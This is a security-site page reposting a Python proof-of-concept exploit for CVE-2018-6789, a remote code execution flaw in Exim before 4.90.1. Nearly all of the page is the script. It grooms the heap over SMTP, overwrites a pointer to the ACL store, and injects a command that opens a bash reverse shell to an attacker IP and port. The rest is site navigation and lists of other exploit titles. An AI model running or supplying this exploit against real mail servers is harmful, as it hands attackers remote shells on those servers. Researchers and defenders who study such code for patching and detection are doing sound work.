首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Exim < 4.90.1 - 'base64d' Remote Code Execution 来源：straightblast426@gmail.com 作者：straight_blast 发布时间：2018-05-03   #!/usr/bin/python import time import socket import struct s = None f = None def logo():    print    print "        CVE-2018-6789 Poc Exploit"    print "@straight_blast ; straightblast426@gmail.com"    print def connect(host, port):    global s    global f    s = socket.create_connection((host,port))    f = s.makefile('rw', bufsize=0) def p(v):    return struct.pack("<Q", v) def readuntil(delim='\n'):    data = ''    while not data.endswith(delim):       data += f.read(1)    return data def write(data):    f.write(data + "\n") def ehlo(v):    write("EHLO " + v)    readuntil('HELP') def unrec(v):    write(v)    readuntil('command') def auth_plain(v):    encode = v.encode('base64').replace('\n','').replace('=','')    write("AUTH PLAIN " + encode)    readuntil('data') def one_byte_overwrite():    v = "C" * 8200    encode = v.encode('base64').replace('\n','').replace('=','')    encode = encode[:-1] + "PE"    write("AUTH PLAIN " + encode)    readuntil('data') def exploit():    logo()    connect('localhost', 25)    print "[1] connected to target"    time.sleep(0.5)          ehlo("A" * 8000)        ehlo("B" * 16)    print "[2] created free chunk size 0x6060 in unsorted bin"        unrec("\xff" * 2000)    ehlo("D" * 8200)    one_byte_overwrite()    print "[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0"        fake_header  = p(0)    fake_header += p(0x1f51)    auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))    print "[4] patched chunk with fake header so extended chunk can be freed"        ehlo("F" * 16)    print "[5] freed extended chunk"        unrec("\xff" * 2000)    unrec("\xff" * 2000)    print "[6] occupied 1st and 3rd item in unsorted bin with fillers"        fake_header  = p(0x4110)    fake_header += p(0x1f50)      auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))    print "[7] patched chunk with fake header so extended chunk can be allocated"        address = 0x55d7e5864480    auth_plain("H" * 8200 + p(0x2021) + p(address)  + p(0x2008) + "H" * 184)    print "[8] overwrite 'next' pointer with ACL store block address"        ehlo("I" * 16)    print "[9] freed the ACL store block"        acl_smtp_rcpt_offset = 288    local_host = '192.168.0.159'    local_port = 1337    cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""    cmd_expansion_string = "${run{" + cmd + "}}\0"    auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))    print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"      write("MAIL FROM:<test@pwned.com>")    readuntil("OK")    write("RCPT TO:<shell@pwned.com>")      print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"    print if __name__ == '__main__':    exploit()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Metasploit Framework - 'msfd' ·Schneider Electric InduSoft We ·Metasploit Framework - 'msfd' ·Adobe Reader PDF - Client Side ·xdebug < 2.5.5 - Unauthenticat ·GPON Routers - Authentication ·WebKit - 'WebCore::jsElementSc ·TBK DVR4104 / DVR4216 - Creden ·Easy MPEG to DVD Burner 1.7.11 ·Linux Kernel < 4.17-rc1 - 'AF_ ·LibreOffice/Open Office - '.od ·Windows - Local Privilege Esca   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved